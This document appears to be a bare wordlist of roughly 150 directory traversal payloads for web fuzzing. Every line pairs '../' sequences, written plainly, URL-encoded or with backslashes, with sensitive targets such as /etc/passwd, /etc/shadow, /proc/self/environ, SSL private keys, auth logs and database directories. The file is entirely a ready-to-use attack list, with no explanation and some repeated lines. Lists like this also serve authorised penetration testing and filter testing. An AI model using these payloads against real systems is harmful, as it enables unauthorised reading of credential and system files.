../../../../etc/passwd
..//..//..//..//etc/passwd
..%2F..%2F..%2F..%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cetc%5Cpasswd
../../../../etc/shadow
/../../../etc/shadow
..%5C..%5C..%5C..%5Cetc%5Cshadow
..//..//..//..//etc//shadow
..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2E%2E%2F%2E%2E%2F%2E%2E%2F..%2Fetc%2Fshadow
/..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
../../../../proc/self/environ
%2E%2E%2F%2E%2E%2F%2E%2E%2Fproc%2Fself%2Fenviron
/../../../proc/self/environ
..%5C..%5C..%5C..%5Cproc%5Cself%5Cenviron
..//..//..//..//proc//self//environ
/..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Findex.html
../../../../var/www/html/index.html
..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Findex.html
/..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Findex.html
..%5C..%5C..%5C..%5Cvar%5Cwww%5Chtml%5Cindex.html
/../../../var/www/html/index.html
..//..//..//..//var//www//html//index.html
..%2F..%2F..%2F..%2Fhome%2Fuser%2Fsecretfile.txt
../../../../home/user/secretfile.txt
..%2F..%2F..%2F..%2Fhome%2Fuser%2Fsecretfile.txt
..%5C..%5C..%5C..%5Chome%5Cuser%5Csecretfile.txt
..//..//..//..//home//user//secretfile.txt
..%2F..%2F..%2F..%2Froot%2Ftopsecret%2Fconfig.cfg
../../../../root/topsecret/config.cfg
/../../../root/topsecret/config.cfg
..%2F..%2F..%2F..%2Froot%2Ftopsecret%2Fconfig.cfg
..//..//..//..//root//topsecret//config.cfg
..%5C..%5C..%5C..%5Croot%5Ctopsecret%5Cconfig.cfg
../../../../etc/hosts
..//..//..//..//etc//hosts
..%5C..%5C..%5C..%5Cetc%5Chosts
..%2F..%2F..%2F..%2Fetc%2Fhosts
..//..//..//..//var//log//syslog
../../../../var/log/syslog
/../../../var/log/syslog
..%2F..%2F..%2F..%2Fvar%2Flog%2Fsyslog
..%5C..%5C..%5C..%5Cvar%5Clog%5Csyslog
..%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Flog%2Fsyslog
..//..//..//..//tmp//upload//file
../../../../tmp/upload/file
/../../../tmp/upload/file
..%2F..%2F..%2F..%2Ftmp%2Fupload%2Ffile
/../..//..//..%2Fetc%2Fpasswd
..%2E%2E%2F..%2E%2E%2F..%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F..%2Fetc%2Fshadow
..//..//..//..//home//user//notes.txt
..//..//..//..//etc//apache2//httpd.conf
..//..//..//..//root//topsecret//file.pdf
..%5C..%5C..%5C..%5Croot%5Ctopsecret%5Cfile.pdf
/../../../var/lib/mysql
..%2E%2E%2F%2E%2E%2F..%2Fvar%2Flib%2Fmysql
..%5C..%5C..%5C..%5Cvar%5Clib%5Cmysql
../../../../var/lib/mysql
/../../../etc/nginx/nginx.conf
..%5C..%5C..%5C..%5Cetc%5Cnginx%5Cnginx.conf
..//..//..//..//etc//nginx//nginx.conf
..//..//..//..//etc//apache2//apache2.conf
../../../../etc/apache2/apache2.conf
..%5C..%5C..%5C..%5Cetc%5Capache2%5Capache2.conf
/../../../etc/apache2/apache2.conf
../../../../etc/ssl/private/ssl-cert-snakeoil.key
..%2E%2E%2F%2E%2E%2F..%2Fetc%2Fssl%2Fprivate%2Fssl-cert-snakeoil.key
/../../../etc/ssl/private/ssl-cert-snakeoil.key
..//..//..//..//etc//ssl//private//ssl-cert-snakeoil.key
..//..//..//..//var//tmp//.X11-unix
../../../../var/tmp/.X11-unix
..%5C..%5C..%5C..%5Cvar%5Ctmp%5C.X11-unix
..%2F..%2F..%2F..%2Fvar%2Ftmp%2F.X11-unix
/..%2F..%2F..%2F..%2Fdev%2Fnull
../../../../dev/null
/../../../dev/null
..//..//..//..//dev//null
..%2F..%2F..%2F..%2Fvar%2Flog%2Fmessages
../../../../var/log/messages
/../../../var/log/messages
..//..//..//..//var//log//messages
..%5C..%5C..%5C..%5Cvar%5Clog%5Cmessages
..%2F..%2F..%2F..%2Fvar%2Flog%2Fauth.log
../../../../var/log/auth.log
..%5C..%5C..%5C..%5Cvar%5Clog%5Cauth.log
..//..//..//..//var//log//auth.log
/../../../var/log/auth.log
..%2F..%2F..%2F..%2Fhome%2Fuser%2Fsecret.pdf
../../../../home/user/secret.pdf
/../../../home/user/secret.pdf
..//..//..//..//home//user//secret.pdf
..%5C..%5C..%5C..%5Chome%5Cuser%5Csecret.pdf
..%2E%2E%2F%2E%2E%2F%2E%2E%2Fhome%2Fuser%2Fsecret.pdf
/..%2F..%2F..%2F..%2Fdev%2Fshm%2F
../../../../dev/shm/
/../../../dev/shm/
..//..//..//..//dev//shm//
..%5C..%5C..%5C..%5Cdev%5Cshm%5C
/..%2F..%2F..%2F..%2Ftmp%2Fbackup%2F
../../../../tmp/backup/
..//..//..//..//tmp//backup//
..%2F..%2F..%2F..%2Ftmp%2Fbackup%2F
..%5C..%5C..%5C..%5Ctmp%5Cbackup%5C
/..%2F..%2F..%2F..%2Fhome%2Froot%2Fsecret.key
../../../../home/root/secret.key
..%2E%2E%2F%2E%2E%2F..%2Fhome%2Froot%2Fsecret.key
/../../../home/root/secret.key
..%5C..%5C..%5C..%5Chome%5Croot%5Csecret.key
..//..//..//..//var//db//sqlite3.db
../../../../var/db/sqlite3.db
/../../../var/db/sqlite3.db
..%2F..%2F..%2F..%2Fvar%2Fdb%2Fsqlite3.db
..%5C..%5C..%5C..%5Cvar%5Cdb%5Csqlite3.db
..//..//..//..//var//db//mysql//
../../../../var/db/mysql/
..%5C..%5C..%5C..%5Cvar%5Cdb%5Cmysql%5C
..//..//..//..//var//db//mysql//
..%2F..%2F..%2F..%2Fvar%2Fdb%2Fmysql%2F
../../../../var/tmp/testfile.txt
/../../../var/tmp/testfile.txt
..%2E%2E%2F%2E%2E%2F..%2Fvar%2Ftmp%2Ftestfile.txt
..//..//..//..//var//tmp//testfile.txt
..%5C..%5C..%5C..%5Cvar%5Ctmp%5Ctestfile.txt
..%2F..%2F..%2F..%2Fetc%2Fssl%2Fcerts%2Fssl-cert-snakeoil.pem
../../../../etc/ssl/certs/ssl-cert-snakeoil.pem
/../../../etc/ssl/certs/ssl-cert-snakeoil.pem
..//..//..//..//etc//ssl//certs//ssl-cert-snakeoil.pem
..%5C..%5C..%5C..%5Cetc%5Cssl%5Ccerts%5Cssl-cert-snakeoil.pem
..//..//..//..//var//log//dmesg
../../../../var/log/dmesg
/../../../var/log/dmesg
..%2F..%2F..%2F..%2Fvar%2Flog%2Fdmesg
..%5C..%5C..%5C..%5Cvar%5Clog%5Cdmesg
..%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Flog%2Fdmesg
..//..//..//..//etc//passwd
../../../../etc/passwd
/../../../etc/passwd
..%5C..%5C..%5C..%5Cetc%5Cpasswd
..//..//..//..//etc//passwd
/../../../etc/passwd
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Croot%5Cpasswd
/..%2F..%2F..%2F..%2Fhome%2Fuser%2Fsecretfolder%2F
../../../../home/user/secretfolder/
/../../../home/user/secretfolder/
..//..//..//..//home//user//secretfolder//
..%5C..%5C..%5C..%5Chome%5Cuser%5Csecretfolder%5C